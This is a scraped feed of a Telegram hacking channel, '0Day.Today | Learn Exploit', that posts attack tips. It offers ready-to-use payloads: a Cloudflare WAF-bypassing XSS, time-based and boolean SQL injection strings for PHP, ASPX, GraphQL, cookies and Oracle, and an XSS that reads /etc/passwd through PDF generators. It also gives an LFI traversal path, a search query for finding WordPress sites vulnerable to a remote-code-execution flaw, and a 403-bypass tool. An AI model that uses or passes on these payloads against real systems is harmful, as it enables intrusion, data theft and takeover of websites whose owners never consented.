0Day.Today | Learn Exploit | Zero World | Dark web |
18.7K subscribers
1.23K photos
122 videos
487 files
1.26K links
☝️Iп Tнε Nαмε Oғ GOD☝️

Web Exploiting
& Server Hacking
Shell & Admin panel Access

priv8 Google hacking Dorks
new vul & bugs discovering & Tut


❗️0 day is today❗️

تبلیغات : @LearnExploitAds

IR0Day.Today
Download Telegram
Cloudflare WAF Bypass Leads to Reflected XSS ®️

Payload Used : "><img src=x onerror=alert(1)> [Blocked By Cloudflare]

Payload Used : "><img src=x onerrora=confirm() onerror=confirm(1)> [XSS Popup]

#WAF #Bypass #XSS
——————
0Day.Today
@LearnExploit
@Tech_Army
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
4🔥42👍1👎1
7 SQLs

4 in php

(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/

1 in aspx

orwa';%20waitfor%20delay%20'0:0:6'%20--%20

2 in graphql

orwa') OR 11=(SELECT 11 FROM PG_SLEEP(6))--

#SQL #sql_injection
——————
0Day.Today
@LearnExploit
@Tech_Army
🔥9❤‍🔥3👍2
PoC + Nuclei + Query CVE-2024-25600 Unauth RCE - WordPress Bricks - 1.9.6 CVSS 9.8

Query Fofa: body="/wp-content/themes/bricks/"

POC

Nuclei

#POC #Wordpress #RCE #CVE
——————
0Day.Today
@LearnExploit
@Tech_Army
8❤‍🔥3🔥3👍1
Google Dorks to Find Sensitive data or dir

#google #cybersec #infosec

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
83❤‍🔥1🔥1
Forwarded from ..:: X P 4 ::..
توضیحاتی درباره فیلتر روبیکا🔥
مراقب کلاهبرداران باشید بعضیا میان دوباره میگن رفع فیلتری وجود داره هعب
Google Bug Bounty Dorks Generator

🌎 Site

#BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥721💯1
Found SQL Injection in [org_id] Cookie
Payloads for Testing:
-1 OR 0=6 AND 0-0=> FALSE
-1 OR 6=6 AND 0-0=> TRUE

Injected in request like this
Cookie:organization_id=-1%20OR%200%3D6%20AND%200-0

#BugBounty #Tips #SQL

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
72🔥1💯1
⚠️ Malware Hiding in PDFs ⚠️

🛸 What You Need to Know

👁 Here 👁

#Notification #Warning

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍722🔥1💯1
This is very cool. Get cheatsheets in your terminal with a curl command!

⌨️ Try this:
curl https://cht.sh/sqlmap

#Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
👍621🔥1💯1
🪐 Telegram OSINT Github collections 🪐

😸 Telegram OSINT
⬇️ Download

😸 Awesome Telegram OSINT
⬇️ Download

😸 Discord-and-Telegram-OSINT-references
⬇️ Download

🔒 LearnExploit

#Osint #Telegram #Discord

📣 T.me/BugCod3
📣 T.me/LearnExploit
Please open Telegram to view this post
VIEW IN TELEGRAM
53👍21🔥1💯1
If you discover an oracle web app, you can use this payload

EHY01%27OR+1%3d1+AND+NVL(ASCII(SUBSTR((SELECT+chr(78)%7c%7cchr(69)%7c%7cchr(84)%7c%7cchr(83)%7c%7cchr(80) )%7c%7cchr(65)%7c%7cchr(82)%7c%7cchr(75)%7c%7cchr(69)%7c%7cchr(82)+FROM+DUAL)%2c9%2c1))%2c0) %3d82--


#BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
4👍21🔥1
NoMore403

Introduction:
nomore403 is an innovative tool designed to help cybersecurity professionals and enthusiasts bypass HTTP 40X errors encountered during web security assessments. Unlike other solutions, nomore403 automates various techniques to seamlessly navigate past these access restrictions, offering a broad range of strategies from header manipulation to method tampering.

Prerequisites:
Before you install and run nomore403, make sure you have the following:

Go 1.15 or higher installed on your machine

Installation:
cd nomore403
go get
go build


Customization:
To edit or add new bypasses, modify the payloads directly in the payloads folder. nomore403 will automatically incorporate these changes.

Usage:
./nomore403 -h


Github

⬇️ Download
🔒 LearnExploit

#Pentesting #Bypass

📣 T.me/BugCod3
📣 T.me/LearnExploit
7👍4
One line for subdomain

$(subfinder -d http://tesla.com| dnsx |httpx); do katana -u "$subdomain" -d 5 -jc -jsl -aff -kf all -mrs 5242880 -timeout 15 -retry 3 -s breadth-first -iqp -cs "$subdomain" -f url -sf url -rl 200 -p 20 -dr -nc -H -silent -fdc 'status_code == 404' ;done

#BugBounty #Tips

📣 T.me/BugCod3
📣 T.me/LearnExploit
7👎3👍21
XSS to Exfiltrate Data from PDFs 🔥🥵

<script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/hosts’);x.send();</script><script>x=new XMLHttpRequest;x.onload=function(){document.write(this.responseText)};http://x.open(‘GET’,’file:///etc/passwd’);x.send();</script>

#xss
——————
0Day.Today
@LearnExploit
@Tech_Army
5👍5👎1
Quick and amazing LFI

filePath=../../../../../../../../../../../../../../windows/system32/drivers/etc/hosts

#Lfi
——————
0Day.Today
@LearnExploit
@Tech_Army
7👎3👍1